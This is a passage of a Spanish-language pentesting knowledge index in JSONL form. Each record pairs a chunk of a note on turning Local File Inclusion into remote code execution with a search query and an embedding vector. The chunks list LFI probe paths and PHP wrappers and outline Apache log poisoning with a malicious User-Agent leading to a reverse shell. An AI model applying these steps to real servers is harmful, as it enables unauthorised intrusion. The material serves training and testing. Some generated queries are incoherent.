-0.0348, 0.01739, 0.11554, -0.01354, -0.11116, 0.04988, -0.0123, 0.01847, -0.00435, -0.01384, 0.02368, -0.05466, 0.05803, -0.07877, -0.1005, -0.02682, 0.0288, 0.00519, 0.00691, 0.05906, -0.05658, -0.0109, 0.0411, -0.07221, -0.04108, 0.14819, 0.04075, 0.08811, 0.00444, -0.03868, -0.03277, -0.05483, -0.03822, -0.01676, 0.04361, -0.01747, -0.00039, -0.00501, -0.04221, 0.00894, -0.01776, -0.02628, -0.01643, -0.06386, 0.03106, -0.01387, 0.01985, 0.03996, 0.03518, -0.01065, 0.08172, 0.00462, 0.05055, 0.06918, -0.01189, 0.01632, -0.03005, -0.01577, -0.02998, 0.02117, -0.04225, -0.06976, -0.04864, -0.0172, -0.00624, 0.0346, -0.05461, -0.04003, -0.01475, -0.05544, 0.02713, 0.07429, -0.04054, -0.07555, -0.0537, -0.01539, -0.03077, 0.00189, 0.07635, -0.05153, -0.03765, -0.0072, -0.02662, -0.00368, -0.01449, 0.02061, 0.05314, -0.01677, 0.02905, -0.03024, -0.04716, -0.03908, -0.00031, -0.00566, -0.02144, 0.0337, -0.00677, -0.05839, 0.06143, -0.01917, 0.00343, -0.00406, 0.037, -0.02202, -0.02749, -0.06046, 0.09361, 0.01814, 0.01539, -0.0254, -0.01229, -0.01557, -0.13326, -0.00997, 0.07478, -0.08271, 0.01098, -0.01214, 0.03232, 0.0011, 0.06798, -0.04493]} -{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# LFI a RCE\n\n> Local File Inclusion β†’ ejecuciΓ³n de cΓ³digo. Vector clΓ‘sico de Hacking web. Pariente de Directory traversal (traversal lee; LFI incluye/ejecuta).", "indexar": "como detecto si mi sitio web tiene vulnerabilidades de Local File Inclusion que permitan ejecutar codigo?", "v": [0.058, -0.00373, -0.08498, -0.11137, 0.12127, -0.17242, -0.0119, -0.02225, -0.08654, -0.14021, -0.0599, -0.01267, -0.0988, -0.07178, 0.09411, 0.01518, 0.14107, -0.18899, 0.01169, -0.14387, -0.03999, -0.05656, 0.03833, -0.01853, 0.07356, -0.02593, 0.07887, -0.00279, -0.09498, -0.06463, -0.01869, -0.01846, 0.04603, 0.09679, -0.07745, 0.0107, -0.00643, 0.00398, -0.08164, 0.00475, 0.05791, 0.03978, -0.166, 0.04034, -0.01055, -0.02296, -0.0423, -0.02666, 0.00863, 0.02847, -0.03397, -0.00215, -0.18512, -0.04307, -0.00029, -0.03678, 0.14318, -0.07697, 0.11851, -0.01312, -0.08394, -0.00046, 0.00941, 0.01039, 0.02967, 0.01349, -0.00999, 0.0811, -0.07116, 0.00789, -0.0323, 0.01769, -0.00933, 0.01898, 0.07664, -0.04041, -0.03771, -0.03834, 0.09441, -0.01339, 0.0843, 0.03474, -0.0114, 0.05706, -0.20122, -0.06097, -0.01594, -0.08298, 0.05871, -0.07955, 0.14071, 0.0342, -0.02127, 0.08013, 0.00406, -0.04557, 0.10217, 0.04258, -0.01611, 0.01752, 0.02622, -0.03245, -0.02378, 0.06499, 0.17504, 0.10461, -0.01586, 0.08077, 0.02389, -0.09357, 0.04264, -0.04358, -0.07194, -0.05889, -0.11636, 0.04553, 0.02113, 0.01677, 0.09307, -0.01201, -0.14263, -0.03552, -0.07018, 0.03086, -0.05549, -0.02281, -0.05553, 0.02038, -0.0514, -0.07465, -0.01467, -0.07523, -0.02614, -0.00652, -0.01345, 0.08053, 0.03639, 0.0053, -0.07102, 0.03221, 0.06705, -0.07934, -0.01807, 0.06284, 0.06527, 0.01849, -0.04775, 0.00474, -0.1306, 0.04127, -0.04553, 0.06349, -0.06552, 0.0152, -0.05931, 0.04057, 0.02972, -0.01663, 0.02204, 0.0432, 0.03061, 0.05368, 0.03102, -0.00085, 0.04084, 0.06169, -0.04222, 0.01649, 0.13066, -0.00157, -0.05308, 0.07597, -0.0335, -0.0615, -0.00418, -0.0689, -0.02691, -0.05648, 0.04751, -0.07817, -0.04215, 0.04522, 0.01876, -0.01326, -0.01577, 0.01552, 0.04902, 0.00438, -0.01742, 0.03842, 0.0344, -0.03028, -0.03237, 0.09788, 0.0032, -0.02316, -0.02131, -0.0044, 0.01455, -0.04869, -0.09886, -0.02615, -0.06685, -0.03074, 0.00684, 0.07507, -0.01811, -0.02457, -0.06362, 0.04287, -0.02585, -0.01516, 0.10032, -0.05501, -0.06988, -0.05673, 0.09314, 0.02497, 0.01271, 0.00445, -0.02193, 0.03866, 0.08253, 0.01372, 0.01712, -0.01904, 0.00353, 0.01369, 0.05709, 0.07456, 0.03205, 0.00068, -0.09035, -0.08067, 0.07246, -0.01912, 0.01301, -0.02314, -0.04263, -0.06543, 0.06039, 0.06674, 0.00119, -0.09082, 0.01126, -0.06091, -0.09751, -0.02048, 0.01583, -0.0568, -0.01027, 0.02383, 0.08628, -0.07057, 0.04106, -0.05824]} -{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Si tienes LFI bΓ‘sico, prueba\n```\n/proc/self/environ # con User-Agent malicioso\n/var/log/apache2/access.log # log poisoning + curl con UA payload\nphp://filter/convert.base64-encode/resource=index.php # leer fuente\ndata://, expect://, phar:// # PHP wrappers\n```", "indexar": "que programa sirve para leer archivos de entorno del propio proceso?", "v": [-0.00877, 0.05807, -0.08566, -0.27239, 0.03617, -0.16976, 0.07578, -0.05699, -0.0547, -0.11993, -0.07109, 0.00733, 0.01157, -0.12091, 0.00764, 0.04683, 0.15368, -0.08128, 0.04277, 0.02713, -0.08249, 0.07916, -0.02516, -0.02601, -0.03365, 0.00124, 0.05901, -0.02895, -0.05068, 0.04236, -0.02915, 0.16901, 0.17956, -0.10423, -0.02937, -0.02213, 0.01933, 0.08395, -0.11176, 0.12919, 0.04102, 0.00931, -0.03498, 0.14235, 0.03224, -0.08967, 0.08874, -0.06542, -0.03329, -0.09249, -0.00879, -0.05232, 0.07935, 0.06425, 0.04997, -0.05265, -0.04984, -0.20492, 0.03624, -0.05426, -0.09363, 0.0744, 0.0362, -0.09707, 0.0561, -0.0486, 0.06008, 0.10497, -0.07884, 0.04273, -0.06733, -0.02686, 0.08362, -0.06011, -0.09065, 0.00826, -0.00925, -0.01009, 0.01063, -0.07876, 0.04847, -0.01069, -0.00128, 0.03894, -0.05362, 0.01277, 0.00459, 0.01193, 0.08608, -0.00058, -0.02601, 0.10707, 0.00407, 0.00705, 0.05293, -0.07839, 0.13869, -0.03022, 0.03462, 0.06126, -0.00038, -0.10055, -0.03523, 0.06976, 0.01135, 0.14155, 0.08613, 0.01043, -0.05944, -0.04882, 0.00035, -0.00807, -0.0094, 0.05395, -0.08421, 0.01297, 0.01096, -0.05314, 0.01315, -0.05339, -0.05738, 0.05675, -0.06475, 0.00035, 0.03531, -0.03132, 0.00783, 0.05038, 0.00557, 0.07895, 0.02003, 0.08521, -0.05873, -0.00913, -0.10592, -0.14327, 0.01354, 0.0258, -0.00717, -0.09224, 0.10623, 0.05761, 0.0084, 0.03787, 0.06107, -0.0031, 0.0513, -0.09636, 0.07474, -0.04369, -0.03637, -0.00726, 0.03871, -0.02203, -0.11723, -0.07579, -0.02472, -0.08591, -0.00967, 0.00666, -0.08715, 0.05216, -0.042, 0.00255, 0.01721, -0.06368, 0.03626, 0.00254, 0.05086, 0.03846, -0.03522, 0.00261, 8e-05, -0.04682, -0.01807, 0.05847, -0.01362, -0.10099, 0.0369, 0.01452, -0.0669, 0.01259, 0.04433, 0.00326, -0.04629, -0.01873, 0.02962, 0.0191, 0.01271, 0.03313, -0.03165, 0.01825, -0.07459, -0.01816, -0.05251, -0.00444, -0.10747, 0.01551, 0.02277, -0.06496, -0.0276, 0.04715, 0.0312, 0.03917, 0.00184, 0.1106, -0.01069, 0.01783, 0.02382, 0.08314, 0.03267, -0.0104, 0.09727, 0.08566, -0.02787, -0.02279, -0.01821, 0.03905, 0.09114, 0.06833, 0.05008, 0.00687, 0.0801, 0.04254, -0.01796, -0.06758, -0.00116, -0.01817, 0.01766, -0.00349, -0.02793, -0.00195, -0.02664, 0.00037, -0.00209, 0.00971, 0.02209, -0.00326, -0.04085, -0.08683, 0.0168, 0.06247, -0.04277, -0.08684, -0.04121, 0.00358, -0.02612, 0.01809, 0.04702, -0.021, -0.07059, 0.00732, 0.00059, 0.00595, 0.03403, 0.02678]} -{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Si tienes LFI bΓ‘sico, prueba\n```\n/proc/self/environ # con User-Agent malicioso\n/var/log/apache2/access.log # log poisoning + curl con UA payload\nphp://filter/convert.base64-encode/resource=index.php # leer fuente\ndata://, expect://, phar:// # PHP wrappers\n```", "indexar": "con que puedo realizar ataques deinyecciΓ³n de logs en Apache?", "v": [-0.17918, 0.23197, -0.03211, -0.02575, 0.00445, 0.042, 0.09526, 0.00881, -0.08624, 0.04097, -0.00912, -0.04269, -0.08341, -0.03849, 0.1217, -0.06502, 0.04917, -0.0402, 0.05709, 0.02074, -0.09697, -0.00753, -0.0055, 0.13713, 0.06015, -0.0139, 0.12002, 0.08995, -0.14535, -0.1704, -0.14536, -0.00415, 0.05028, 0.07899, 0.1134, 0.04008, 0.06261, 0.0541, 0.1055, 0.09278, -0.06271, -0.11742, -0.23446, -0.1172, 0.11886, -0.02568, 0.02377, 0.00587, 0.07138, -0.04328, -0.05382, 0.04922, -0.1765, -0.02394, -0.07557, -0.03118, 0.03411, -0.09385, 0.08152, -0.02017, -0.18591, 0.07374, -0.01234, -0.07508, 0.11955, -0.02552, 0.01442, -0.04384, -0.01865, 0.00666, -0.0563, 0.0787, -0.03224, 0.07246, 0.06438, -0.0056, -0.01191, 0.06941, -0.03849, 0.04298, 0.03973, -0.01738, -0.02903, 0.03391, -0.07055, 0.00157, -0.05142, -0.09547, 0.01711, -0.11295, 0.05524, 0.0345, 0.04447, 0.0023, -0.02593, 0.00069, 0.03468, -0.07535, -0.02781, -0.0944, -0.08526, 0.03067, -0.02353, 0.17438, 0.04637, 0.05161, -0.04072, 0.0168, 0.01021, -0.14455, 0.01144, -0.05458, -0.11004, -0.03396, -0.00731, -0.0414, -0.08021, -0.01844, 0.01294, -0.03061, -0.05532, -0.01092, -0.05127, 0.05316, 0.05485, 0.01684, 0.01332, 0.01585, -0.05582, 0.00018, -0.00453, 0.03413, -0.01267, -0.05314, -0.00376, -0.00528, -0.04363, -0.04319, -0.02894, 0.05173, 0.0438, 0.08629, -0.02266, 0.02139, 0.07481, 0.0315, -0.04761, -0.01228, -0.0835, -0.0347, 0.08131, 0.02088, 0.0203, 0.01057, -0.0898, -0.01097, -0.00874, -0.10465, -0.01717, 0.04922, 0.02717, 0.0716, -0.05779, 0.01592, -0.02472, -0.01822, -0.03302, -0.0322, 0.12047, 0.04937, 0.02461, 0.03093, 0.00127, -0.08962, -0.02348, -0.06713, -0.07071, -0.08168, 0.02865, -0.00753, -0.03351, -0.05365, -0.02187, 0.01991, 0.03236, 0.01385, 0.03302, 0.07692, 0.03499, 0.03414, 0.01799, 0.00419, 0.01028, 0.03131, 0.03859, -0.05907, -0.02636, 0.00599, -0.03694, 0.02423, 0.02524, 0.01741, -0.03884, -0.07254, 0.06056, 0.09993, -0.02275, -0.02341, -0.00262, 0.00602, 0.0612, -0.0063, 0.08022, -0.06891, -0.08396, 0.03296, 0.0256, 0.03021, -0.0287, -0.03872, 0.02237, 0.03097, 0.02902, -0.01857, -0.00704, -0.02677, 0.00547, -0.0754, 0.03874, 0.05872, -0.01148, -0.02487, -0.04579, -0.0327, -0.00847, -0.00864, 0.01274, -0.00947, -0.02722, 0.02256, -0.02997, 0.05129, 0.04773, -0.02839, -0.06936, -0.06294, -0.10724, 0.02357, 0.00795, -0.04788, -0.01443, 0.02769, 0.0121, 0.02499, 0.0503, 0.00935]} -{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Si tienes LFI bΓ‘sico, prueba\n```\n/proc/self/environ # con User-Agent malicioso\n/var/log/apache2/access.log # log poisoning + curl con UA payload\nphp://filter/convert.base64-encode/resource=index.php # leer fuente\ndata://, expect://, phar:// # PHP wrappers\n```", "indexar": "cual es una alternativa libre a los PHP wrappers data:// y phar://?", "v": [0.01651, 0.00987, -0.06159, -0.04014, -0.01038, 0.00582, 0.16245, -0.09133, -0.12728, -0.0091, -0.01865, -0.05262, -0.0273, -0.02668, 0.00306, -0.04591, -0.08677, -0.05018, 0.10458, -0.00564, -0.11106, 0.10057, -0.18245, -0.25563, -0.19435, -0.03269, -0.07063, 0.06087, -0.17912, -0.05124, 0.2371, 0.10374, 0.04383, 0.05588, -0.08004, 0.1212, 0.09661, 0.05981, 0.03569, -0.01431, -0.03974, 0.0655, -0.02952, 0.1331, 0.03578, 0.00335, -0.10066, -0.02206, 0.10027, 0.00718, 0.03431, -0.02771, -0.06536, 0.09677, 0.05137, -0.05884, 0.04882, -0.16256, 0.01444, 0.10834, -0.08491, 0.00932, 0.01705, -0.09762, 0.13024, 0.0553, 0.07714, 0.02548, 0.01009, 0.0935, -0.01524, 0.03306, -0.04756, 0.00223, -0.05279, 0.07988, -0.02641, -0.01166, -0.01223, 0.10863, -0.04406, -0.1032, -0.00218, 0.05102, 0.02397, -0.16626, 0.07784, -0.02264, -0.01824, 0.05026, 0.18424, 0.05999, -0.03823, 0.083, -0.03232, -0.0315, -0.03593, 0.0436, -0.02781, 0.00973, 0.02708, 0.05737, -0.04314, -0.06053, 0.14456, 0.01119, 0.07859, 0.10286, -0.03679, -0.05549, -0.009, 0.00648, -0.00232, -0.01209, -0.00818, -0.07757, 0.01639, 0.06141, 0.01947, -0.05966, 0.02746, -0.07227, -0.08373, -0.03228, 0.06513, 0.09105, 0.06251, 0.00335, -0.04245, 0.05283, -0.00278, -0.03064, -0.06317, -0.07255, 0.00094, 0.06316, 0.06886, 0.00519, 0.07981, 0.01431, 0.02592, -0.04681, 0.03691, 0.06812, 0.07946, -0.09667, 0.00817, 0.00464, -0.03789, -0.0199, -0.04976, 0.00631, -0.03715, 0.07011, -0.07257, -0.01349, 0.05549, -0.02035, -0.05592, 0.05487, 0.02174, 0.0121, 0.10407, 0.03189, 0.01421, -0.0507, 0.01161, -0.03573, 0.02307, -0.02759, 0.02032, 0.07818, 0.01736, -0.06652, 0.03437, -0.05227, -0.03191, -0.06176, -0.00013, -0.05081, 0.12256, 0.00726, -0.00229, 0.00402, -0.03654, -0.01174, 0.00637, -0.00368, -0.00522, -0.04616, 0.00439, 0.01952, 0.02365, -0.05464, -0.00865, 0.03496, -0.02696, -0.03703, 0.0055, 0.02075, -0.04497, 0.01508, -0.00601, -0.02127, -0.04585, -0.03577, 0.01001, 0.02747, 0.03548, 0.02697, 0.04306, -0.03052, 0.07371, 0.02909, -0.02626, -0.04179, -0.01345, 0.05054, 0.00604, 0.02318, -0.00899, 0.02038, 0.05129, -0.01505, -0.00154, -0.01442, 0.04883, 0.0513, -0.03008, 0.00103, -0.00254, -0.0111, 0.00042, 0.00252, -0.00263, 0.02959, -0.01729, -0.00482, -0.0367, -0.06626, 0.06162, 0.08695, -0.05075, -0.00613, 0.03776, -0.05263, -0.04861, 0.01378, -0.00963, -0.0388, -0.05935, -0.02727, 0.00533, -0.03246, 0.02088, 0.00898]} -{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Log poisoning (LFI β†’ RCE)\n1. EnvΓ­as una peticiΓ³n con `User-Agent: `.\n2. Incluyes el log: `?page=/var/log/apache2/access.log&c=id`.\n3. El PHP de tu UA se ejecuta β†’ RCE β†’ Reverse shell.", "indexar": "que tΓ©cnica sirve para hacer un reverse shell mediante logs", "v": [0.11614, 0.02389, -0.20991, -0.11936, 0.02421, -0.09226, -0.09119, -0.06555, 0.06781, -0.01487, -0.18609, 0.01403, 0.06305, -0.07494, 0.1747, -0.01378, -0.03794, -0.18947, 0.05675, -0.04797, -0.12987, -0.00967, -0.07739, -0.07037, 0.01777, 0.01794, 0.11501, -0.07752, -0.1645, -0.12032, -0.13452, -0.03455, 0.06311, -0.03973, -0.12331, 0.06238, 0.0279, -0.04487, -0.00396, 0.12104, -0.06706, -0.04104, -0.12218, 0.06513, 0.16218, -0.06105, 0.0728, 0.01393, -0.00413, 0.04859, -0.04736, -0.02782, -0.14928, 0.04925, -0.02542, -0.07753, 0.10386, -0.10073, 0.00801, -0.08832, -0.10523, 0.00127, -0.01236, 0.04738, 0.13468, -0.02687, 0.00058, -0.10699, -0.0131, -0.07064, -0.02018, 0.07594, 0.0326, -0.05683, -0.09035, -0.05214, 0.01523, 0.10037, 0.02651, -0.07368, -0.06288, -0.06483, -0.0703, -0.00051, -0.03135, -0.0123, -0.01883, -0.01276, 0.05415, -0.13098, 0.02369, 0.08152, 0.10081, -0.0254, 0.12222, -0.01973, 0.02908, 0.07812, -0.0271, 0.00664, 0.01031, -0.08894, 0.04265, 0.07193, 0.05138, 0.03874, -0.02279, -0.04136, 0.00314, 0.07085, -0.07064, 0.0139, -0.07194, 0.05826, -0.04235, -0.03329, -0.02666, -0.11572, -0.00705, 0.06299, 0.0267, -0.05762, -0.00832, 0.0488, -0.02204, -0.05239, -0.05408, 0.02383, 0.03322, 0.10536, -0.01624, -0.0103, -0.09834, -0.02149, -0.01393, 0.01541, 0.07802, -0.01405, -0.06408, -0.01419, 0.03747, 0.15393, -0.092, -0.0174, 0.04111, -0.03479, 0.09134, -0.07818, -0.0895, -0.02814, 0.06478, 0.04494, -0.0393, 0.03232, -0.08523, -0.1083, -0.01021, -0.08733, -0.0427, 0.03636, -0.02596, 0.03995, 0.00278, 0.02822, -0.01417, -0.08815, -0.08387, -0.02328, 0.07518, -0.01001, -0.04274, 0.0319, 0.01898, -0.04173, 0.04872, 0.03507, -0.02014, -0.00231, 0.02426, -0.04169, 0.01322, -0.05434, 0.03945, -0.05509, 0.01907, -0.00045, -0.03465, 0.06492, 0.04289, 0.0362, -0.01353, 0.02793, -0.03237, 0.01334, -0.04262, 0.00458, -0.00599, -0.05114, 0.02659, 0.04523, 0.02032, 0.10291, 0.02747, -0.0538, 0.00657, 0.04425, -0.01635, -0.0419, -0.01774, -0.01193, 0.05922, -0.01028, 0.02147, 0.07532, -0.01587, 0.00142, -0.02796, 0.00241, -0.05028, 0.03887, 0.02878, -0.07012, -0.01295, 0.02959, 0.00131, -0.01717, 0.07296, -0.00349, -0.02431, -0.00081, -0.04215, 0.03838, 0.0131, 0.02308, 0.00092, -0.00896, 0.00717, -0.03235, 0.03223, -0.0416, -0.03054, 0.06309, 0.02621, -0.03724, -0.019, -0.02076, -0.04016, 0.02461, 0.01108, -0.04973, -0.00136, 0.00516, 0.01811, 0.01923, 0.03009, -0.0753]} -{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Log poisoning (LFI β†’ RCE)\n1. EnvΓ­as una peticiΓ³n con `User-Agent: `.\n2. Incluyes el log: `?page=/var/log/apache2/access.log&c=id`.\n3. El PHP de tu UA se ejecuta β†’ RCE β†’ Reverse shell.", "indexar": "cΓ³mo ejecutar cΓ³digo a travΓ©s del User-Agent en el servidor", "v": [-0.03577, 0.05372, -0.0079, -0.2078, -0.03463, -0.17405, 0.01194, -0.02671, -0.00467, -0.03977, -0.11414, -0.08343, -0.01485, -0.06149, 0.08489, -0.06943, 0.24499, -0.09893, 0.0658, 0.07978, 0.09634, 0.06468, 0.0741, -0.01909, -0.04306, 0.07535, 0.01395, 0.01215, -0.05329, -0.03221, -0.05592, -0.07969, 0.07793, -0.03828, 0.05952, 0.00368, -0.00585, 0.16749, -0.07321, 0.18043, 0.02871, 0.11071, -0.11854, 0.01826, 0.04371, 0.10156, 0.062, -0.10799, 0.10736, -0.01421, -0.09501, -0.0738, -0.21201, -0.05517, 0.05007, -0.00696, 0.05948, -0.1548, -0.00718, -0.02111, 0.01701, -0.08703, -0.00261, -0.02857, 0.08704, -0.00141, 0.0617, -0.04389, -0.05458, -0.0086, -0.06489, 0.06466, -0.05017, -0.0249, 0.10116, 0.00423, -0.02459, -0.11959, 0.00919, 0.07754, 0.02707, 0.01029, -0.11151, 0.06265, -0.07537, -0.07154, 0.06598, -0.07156, 0.0227, -0.06241, 0.127, 0.00182, 0.00487, 0.07092, 0.08055, -0.03649, 0.07792, -0.05707, 0.06628, 0.00984, 0.11371, -0.05184, -0.01285, 0.09231, 0.11264, 0.08504, 0.07151, -0.02335, 0.0291, -0.01291, 0.04059, -0.07299, -0.06722, -0.04331, -0.0475, -0.05186, 0.02258, -0.04064, 0.06313, -0.00892, -0.14305, 0.05463, -0.03671, 0.05938, 0.0219, -0.02554, 0.06217, 0.04986, -0.04629, -0.08565, -0.10528, -0.02931, -0.05476, 0.05024, 0.04542, 0.06513, 0.06877, -0.02667, -0.05905, 0.00495, -0.00598, -0.04766, 0.02388, 0.09812, 0.08561, 0.02664, 0.05909, -0.09896, -0.09499, 0.01784, 0.07389, -0.01195, -0.10639, 0.0046, -0.10082, -0.00728, -0.04075, -0.04152, -0.03698, 0.04155, 0.00229, 0.02555, 0.0179, -0.00148, 0.00473, -0.03169, -0.00855, 0.01135, 0.04536, 0.00786, 0.0225, -0.01613, 0.0429, -0.0865, 0.03478, -0.0187, -0.03061, -0.03738, -0.023, 0.03388, 0.00326, 0.04685, 0.04926, -0.03453, -0.05899, -0.04603, -0.00627, 0.01408, -0.00427, 0.03361, -0.00879, 0.03031, -0.00458, 0.05376, 0.01818, -0.02415, -0.00183, -0.01292, -0.03006, -0.10528, -0.01517, 0.01923, -0.02374, -0.06665, -0.0197, 0.02055, -0.00366, 0.02596, -0.03967, 0.06537, 0.00213, -0.0538, 0.12677, -0.01527, -0.01809, 0.0094, 0.04269, -0.01312, 0.02317, -0.01056, -0.02571, -0.0068, 0.0031, -0.03585, 0.0013, -0.02205, -0.00244, 0.02065, 0.03384, 0.00423, -0.01487, 0.01753, 0.00585, -0.00097, 0.0383, 0.02484, -0.00269, -0.04148, -0.03084, -0.12001, 0.00758, 0.09013, -0.01251, -0.0817, 0.0142, -0.02822, -0.01081, -0.03969, -0.05272, -0.01755, 0.00964, -0.05214, 0.07352, -0.02058, -0.00534, -0.05903]} -{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Log poisoning (LFI β†’ RCE)\n1. EnvΓ­as una peticiΓ³n con `User-Agent: `.\n2. Incluyes el log: `?page=/var/log/apache2/access.log&c=id`.\n3. El PHP de tu UA se ejecuta β†’ RCE β†’ Reverse shell.", "indexar": "que mΓ©todo permite obtener control total del servidor logueando", "v": [0.02314, 0.03519, -0.2366, -0.19511, -0.08062, -0.08456, 0.05487, -0.01966, -0.0304, -0.03429, -0.13738, -0.00763, 0.14833, -0.07849, 0.09491, 0.02701, 0.19956, -0.2103, -0.10031, -0.03505, -0.00645, 0.02893, 0.01898, -0.06597, 0.02298, -0.00282, 0.12758, -0.11271, -0.056, -0.05056, -0.15632, -0.03529, 0.05498, 0.03916, -0.03239, -0.06321, 0.08657, 0.17146, -0.06284, 0.16921, -0.07709, -0.05056, -0.09539, 0.01515, 0.06317, -0.11701, 0.07525, -0.02189, 0.08516, 0.06043, 0.00574, -0.01626, -0.10098, -0.01778, -0.04362, -0.03742, 0.03318, -0.05417, 0.04894, -0.04338, -0.11077, 0.04417, 0.02642, -0.00524, 0.04296, 0.03439, 0.0548, -0.04092, -0.02511, -0.00749, 0.02357, -0.02011, -0.04995, -0.00829, 0.03577, -0.04267, -0.00152, 0.01307, 0.11273, -0.06028, 0.00805, -0.02945, -0.07428, 0.0568, -0.09288, -0.0358, -0.06138, -0.10461, 0.08441, -0.00922, 0.01572, -0.00062, 0.08033, 0.05756, 0.00949, -0.01149, 0.05004, 0.00902, -0.00582, -0.02373, 0.06711, 0.00777, -0.06618, 0.09685, 0.06949, 0.03811, 0.06949, -0.04793, -0.0139, -0.09284, 0.02622, -0.01389, 0.01369, 0.05824, -0.08323, -0.05721, 0.07139, 0.01213, -0.05344, 0.01985, -0.1185, 0.04286, -0.02828, 0.05328, 0.08865, -0.12872, 0.05141, 0.05871, 0.00433, -0.0765, -0.06324, -0.05726, -0.04659, 0.06849, 0.01088, 0.02589, -0.00244, -0.03815, -0.06839, 0.0243, -0.04494, 0.03075, -0.02517, -0.03944, 0.13327, -0.12813, 0.05012, -0.0705, -0.04883, -0.05857, 0.02037, 0.0314, -0.04713, 0.01084, -0.10097, -0.03442, -0.00341, -0.08416, -0.09041, 0.08243, 0.06469, 0.00953, -0.02021, 0.09436, 0.04359, -0.05754, 0.01136, -0.00046, 0.02318, 0.00728, -0.02594, 0.07414, -0.00152, -0.01527, 0.01389, 0.02496, -0.01801, -0.10375, -0.00971, -0.00113, -0.03834, 0.05488, -0.05276, -0.02914, 0.03243, 0.00496, -0.01035, 0.0578, 0.02388, 0.03048, 0.05046, 0.03746, -0.03918, 0.02784, -0.00091, 0.00055, 0.00149, -0.01796, 0.06769, -0.01496, -0.04513, 0.01719, 0.06885, -0.04093, -0.04434, -0.01525, 0.015, 0.05828, 0.03235, 0.00444, 0.05597, -0.04264, 0.08878, -0.01865, -0.01192, 0.02002, -0.01377, -0.07827, 0.01305, -0.1044, 0.02756, -0.05277, 0.00572, 0.02478, -0.04541, -0.00148, -0.00133, 0.05889, 0.04333, 0.03708, -0.0736, -0.04682, -0.02182, -0.01231, 0.07015, -0.0291, 0.02193, -0.0551, -0.02739, -0.09313, -0.01354, 0.07563, 0.03738, -0.02405, -0.07329, -0.0976, -0.02323, 0.00192, -0.00408, -0.0126, 0.0392, -0.03202, 0.0062, -0.00346, -0.02352, -0.05539]} -{"tipo": "pregunta", "herramienta": "LFI a RCE", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/LFI a RCE.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## php://filter\nLee el cΓ³digo fuente en base64 para encontrar credenciales/segundos vectores (SQL injection, creds en config).\n\nRelacionado: Hacking web Β· Directory traversal Β· File upload bypass Β· Reverse shell Β· OSCP MOC", "indexar": "que programa sirve para leer cΓ³digo fuente de archivos subidos?", "v": [0.03255, -0.09194, -0.10428, -0.1575, -0.02206, -0.27641, 0.01374, -0.04702, -0.05508, -0.08239, -0.08878, -0.17012, 0.00754, -0.12746, -0.01174, -0.09022, 0.12844, -0.06365, 0.06755, -0.02369, 0.06769, 0.01828, -0.04831, -0.1388, -0.07031, -0.00429, 0.02739, 0.05351, -0.03685, -0.01623, -0.02606, 0.05345, 0.09267, 0.03128, -0.08711, 0.06339, 0.08348, 0.10683, -0.15596, 0.08548, -0.00859, 0.0479, -0.08212, 0.02241, -0.02737, -0.11756, 0.08731, 0.0138, 0.04914, 0.01179, -0.02605, -0.01674, -0.0064, 0.01538, -0.05509, -0.0269, -0.05301, -0.1495, -0.14401, 0.05281, 0.01343, -0.04714, 0.02951, -0.20983, -0.04455, 0.01009, 0.07443, 0.10599, -0.08358, -0.02462, -0.03258, 0.05435, 0.02325, -0.02891, -0.01682, 0.02624, -0.01282, -0.10395, -0.02862, 0.04828, -0.00416, -0.00167, -0.04428, -0.01389, -0.00967, -0.04569, 0.0281, -0.01033, -0.01714, -0.03276, 0.08286, 0.06804, 0.0215, 0.04841, 0.05836, -0.02789, 0.07671, 0.03418, 0.04746, 0.0379, 0.03443, -0.11573, 0.01738, 0.08963, 0.11547, 0.17848, 0.05784, -0.01519, -0.03251, 0.03267, -0.00412, -0.01979, -0.05486, 0.04892, -0.13048, 0.03447, 0.00964, 0.00852, 0.00971, -0.09857, -0.0733, 0.11327, -0.09183, 0.07764, 0.03415, 0.04872, 0.06607, 0.07769, 0.00865, 0.0222, -0.05859, 0.0536, 0.0048, 0.05275, -0.06714, -0.06658, 0.0867, 0.06962, -0.02841, -0.0301, 0.0718, 0.06194, 0.04696, 0.16111, 0.04505, 0.00851, 0.01427, -0.0718, -0.05596, -0.06819, -0.04425, 0.03565, -0.03306, -0.0109, -0.07827, -0.00979, 0.02124, -0.07471, -0.12089, 0.04023, -0.05963, 0.00907, -0.0479, -0.05212, 0.01555, -0.08704, 0.04986, 0.02601, 0.00787, 0.03817, -0.00174, 0.04226, 0.0787, -0.10547, 0.02609, 0.01446, -0.01835, -0.08191, -0.03866, 0.00964, -0.06874, 0.04937, 0.08265, 0.02651, -0.04326, -0.0371, 0.03788, 0.00582, -0.00548, -0.04241, -0.01978, -0.00068, -0.00999, 0.00655, -0.00412, -0.01291, -0.00683, 0.04454, 0.02039, -0.08263, -0.06319, 0.06683, -0.03257, -0.00229, 0.04515, 0.05039, -0.00171, -0.034, -0.00627, 0.0759, -0.00441, -0.03453, 0.0774, 0.0126, 0.03389, -0.03997, -0.02732, 0.09629, 0.09603, -0.01044, -0.03316, -0.02937, 0.01018, 0.04503, -0.0189, -0.04847, 0.03073, -0.01489, -0.00068, 0.04466, -0.03123, -0.02448, -0.01633, -0.01347, 0.0221, 0.01893, -0.05682, 